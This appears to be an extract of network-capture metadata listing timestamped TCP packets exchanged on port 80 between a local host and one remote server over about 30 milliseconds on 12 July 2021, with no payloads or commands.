Jul 12, 2021 10:29:47.972721100 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.972914934 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.972949028 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.972992897 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.973025084 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.973078012 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.973098993 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.973124027 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.973151922 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.973186016 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.973798037 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.973824024 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.973848104 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.973886967 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.973908901 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.973942995 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.973954916 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.974035978 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.974066973 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.974488974 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.974653006 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.974678040 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.974715948 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.974733114 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.974766970 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.974781990 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.974807024 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.974838972 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.975297928 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.975436926 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.975469112 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.975491047 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.975588083 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.975613117 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.975625038 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.976126909 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.976172924 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.976316929 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.976346970 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.976358891 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.976385117 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.976429939 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.976453066 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.976480961 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.976991892 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.977112055 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.977155924 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.977180004 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.977226019 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.977252960 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.977279902 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.977308035 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.977335930 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.977948904 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.977976084 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.977998972 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.978038073 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.978071928 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.978094101 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.978104115 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.978152990 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.978178978 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.978759050 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.978802919 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.978832006 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.978842974 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.978893042 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.978930950 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.978960037 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.978981972 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.979010105 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.979640007 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.979724884 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.979820967 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.979943037 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.979969025 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.979995012 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.980024099 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.980031967 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.980146885 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.980494022 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.980567932 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.980602980 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.980611086 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.980634928 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.980705976 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.980729103 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.980811119 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.980846882 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.981518984 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.981548071 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.981579065 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.981586933 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.981611013 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.981633902 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.981643915 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.981666088 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.981803894 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.982192039 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.982347965 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.982366085 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.982444048 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.982461929 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.982474089 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.982485056 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.983100891 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.983130932 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.983145952 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.983166933 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.983191967 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.983215094 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.983226061 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.983247995 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.983258009 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.983284950 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.983879089 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.983896971 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.983912945 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.983989000 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.984018087 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.984108925 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.984144926 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.984318972 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.984774113 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.984874010 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.984905958 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.984925985 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.984976053 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.985002995 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.985011101 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.985037088 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.985491991 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.985573053 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.985599995 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.985624075 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.985651016 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.985662937 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.985687017 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.985709906 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.985749960 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.985757113 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.986534119 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.986644983 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.986664057 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.986690998 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.986716032 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.986735106 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.986757040 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.986793041 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.987246990 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.987277031 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.987289906 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.987363100 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.987420082 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.987538099 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.987561941 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.987586975 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.987649918 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.988183022 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.988274097 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.988282919 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.988308907 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.988332033 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.988353968 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.988377094 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.988388062 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.988413095 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.988934040 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.988966942 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.989002943 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.989196062 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.989222050 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.989247084 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.989273071 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.989299059 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.989314079 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.989337921 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.989408016 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.989907980 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.990008116 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.990128994 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.990155935 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.990179062 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.990202904 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.990226984 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.990238905 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.990267038 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.990298986 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.990369081 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.990406990 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.990818024 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.990941048 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.991008997 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.991085052 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.991107941 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.991223097 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.991249084 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.991261005 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.991286993 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.991313934 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.991319895 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.991833925 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.991877079 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.991913080 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.991938114 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.991962910 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.991991043 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.991997957 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.992016077 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.992033005 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.992059946 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.992067099 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.992089987 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.992708921 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.992748022 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.992837906 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.992866993 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.992908955 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.992934942 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.992959023 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.992985964 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.992994070 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.993014097 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.993026018 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.993048906 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.993083000 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.993484020 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.993573904 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.993756056 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.993875980 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.993885994 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.993907928 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.993927956 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.993988991 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.994010925 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.994020939 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.994046926 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.994071007 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.994080067 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.994107008 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.994601011 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.994829893 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.994921923 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.994955063 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.994962931 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.994991064 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.995018959 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.995026112 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.995047092 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.995058060 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.995079041 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.995620012 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.995659113 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.995731115 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.995757103 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.995829105 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.995835066 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.995846987 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.995904922 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.996032953 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.996103048 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.996134043 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.996157885 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.996444941 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.996471882 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.996484041 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.996505976 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.996567011 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.996572971 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.996596098 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.996617079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.996637106 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.996658087 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.996681929 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.996711016 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.996929884 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.997515917 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.997726917 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.997759104 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.997786999 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.997812033 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.997824907 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.997845888 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.997931957 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.997957945 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.997982025 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.998011112 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.998016119 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.998282909 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.998403072 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.998437881 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.998446941 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.998514891 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.998538017 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.998550892 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.998573065 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.998619080 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.998641968 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.998653889 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.998672962 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.999267101 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.999447107 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.999555111 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.999582052 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.999603987 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.999633074 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.999640942 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.999667883 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.999700069 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.999726057 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.999753952 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.000267029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.000303030 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.000327110 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.000349045 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.000380039 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.000405073 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.000437975 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.000463009 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.000492096 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.000499010 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.000556946 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.000588894 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.001224995 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.001260996 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.001282930 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.001322985 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.001403093 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.001415968 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.001442909 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.001466990 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.001488924 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.001516104 CEST	80	49755	47.254.186.176	192.168.2.3
